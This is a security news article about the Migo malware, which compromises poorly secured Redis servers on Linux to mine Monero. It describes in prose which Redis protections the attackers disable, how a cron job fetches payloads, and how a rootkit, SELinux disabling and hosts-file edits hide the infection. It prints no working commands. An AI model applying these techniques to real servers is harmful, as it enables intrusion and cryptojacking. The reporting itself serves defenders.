Migo malware disables protection on Redis

Researchers have unearthed the Migo malware, crafted in Go, targeting Redis servers on Linux hosts for cryptocurrency mining. Notably, the malware neutralizes Redis’s security mechanisms to facilitate unobstructed cryptojacking.

Experts at Cado Security, who detected Migo in their honeypots, report that the attackers, upon breaching inadequately secured Redis installations, employ CLI commands to deactivate both the protective measures and server functionality.

Migo malware disables protection on Redis servers

Hackers implement the following modifications to Redis settings:

  • set protected-mode: Disabling this setting permits external access to the Redis server, simplifying the execution of malicious commands by attackers from remote locations;
  • replica-read-only: Turning off this feature enables data to be directly written to replicas, allowing the further spread of malicious payloads or data alterations;
  • aof-rewrite-incremental-fsync: Deactivating this option results in an increased IO load during the file rewriting process in AOF mode (append-only file), aiding attackers in evading detection by creating atypical IO patterns to distract defenses;
  • rdb-save-incremental-fsync: Disabling this can lead to suboptimal performance when saving RDB snapshots, potentially facilitating denial of service (DoS) attacks or manipulation of persistence.

Subsequently, the attackers set up a cron job to retrieve a script from Pastebin, which extracts the primary Migo payload (/tmp/.migo) from Transfer.sh for execution as a background process.

ВMigo malware disables protection on Redis servers

According to specialists, Migo’s primary role is to fetch, install, and execute a tailored version of the XMRig miner (targeted at Monero mining) using GitHub CDN on the infiltrated endpoint. Moreover, Migo employs a user-mode rootkit to conceal its processes and files, thereby obstructing the malware’s detection and eradication.

The malware also alters the /etc/ld.so.preload file to modify the behavior of system utilities, compiling lists of processes and files to obscure their existence.

The assault concludes with Migo setting up firewall regulations to restrict outgoing traffic to certain IP addresses, executing commands to deactivate SELinux, and identifying and deactivating monitoring agents of cloud providers. It also eradicates rival miners and additional malware from the server. Furthermore, it adjusts the /etc/hosts file to block communication with cloud service providers, thus further concealing its activities.

0 / 5

Your page rank:

Subscribe: YouTube page opens in new windowLinkedin page opens in new windowTelegram page opens in new window

Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment